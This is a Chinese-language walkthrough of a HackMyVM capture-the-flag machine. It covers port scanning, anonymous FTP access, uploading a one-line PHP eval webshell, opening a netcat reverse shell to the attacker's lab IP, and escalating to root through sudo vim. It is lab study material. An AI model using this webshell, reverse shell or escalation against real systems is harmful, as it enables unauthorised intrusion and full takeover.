friendly靶机渗透

笔记于2025/12/1

参照HakcMyVM/Friendly.md at master · pencek/HakcMyVM · GitHub进行复现

靶机介绍:

FTP服务匿名、WEBSHLL上传、vim提权

攻击机IP:192.168.161.139

靶机IP:192.168.161.140

端口扫描

得知开放FTP服务和WEB应用协议

复制代码
nmap -p- 192.168.161.140

详细信息检测

有匿名账户

复制代码
nmap -p21,80 -A 192.168.161.140

WEB渗透测试

网站首页

目录扫描

只有index.html页面

复制代码
gobuster dir -w /usr/share/wordlists/dirbuster-list-2.3-medium.txt -u http://192.168.161.140/ -x php,html,txt -e

FTP服务

复制代码
ftp 192.168.161.140 
#输入账户anonymous,匿名账户没有密码直接回车,继续输入 
ls -al 
#发现跟目录扫描出来一个框架

上传webshell

复制代码
<?php eval($_POST['x']);?>

上传

复制代码
put rce.php

攻击机开启监听

蚁剑连接webshell,终端执行命令

复制代码
nc -e /bin/bash 192.168.161.139 6666

内网渗透

拿到user.txt

信息收集

复制代码
sudo -l

内网提权

复制代码
https://gtfobins.github.io/gtfobins/vim/#sudo

执行提权命令

复制代码
sudo /usr/bin/vim -c '!/bin/bash'

拿到root.txt,这里的/root/root.txt是假的flag

复制代码
find / -type f -name 'root.txt'

渗透测试收获

FTP匿名登录体验和FTP服务基本命令、新的提权vim提权

相关推荐
AC赳赳老秦5 小时前
采集行为合规自检:OpenClaw 自动校验 robots 协议与采集频率,规避违规采集风险
java·开发语言·c++·python·php·deepseek·openclaw
剑胆凌锋6 小时前
等级保护测评工程师的困境
网络·安全·web安全·网络安全·职场和发展
zhangrelay7 小时前
机械臂末端规划智能模型的误区演示
linux·笔记·学习·ubuntu·ros2
山东科恩光电8 小时前
安全地毯是什么?它有哪几种主要类型和应用场景?
安全
织码weavecodes8 小时前
培训平台部署备份与容灾:从三服务交付到可恢复运行
大数据·学习·开源软件
SHARK_pssm8 小时前
【C++——类和对象(下)】
开发语言·c++·经验分享·笔记
程序员清风10 小时前
PydanticAI 实战:用类型安全构建可靠的 Python Agent
开发语言·python·安全
JWASX10 小时前
Java 转 go 学习 - 类型转换
学习·golang
Ztt66666666610 小时前
壶口敞开以后,器身反而更显从容
笔记·其他·百度·微信公众平台·微信开放平台
林伽一11 小时前
100 万输出词元与窄开放,前沿模型发布范式正在改写|2026年10月02日
人工智能·科技·安全·ai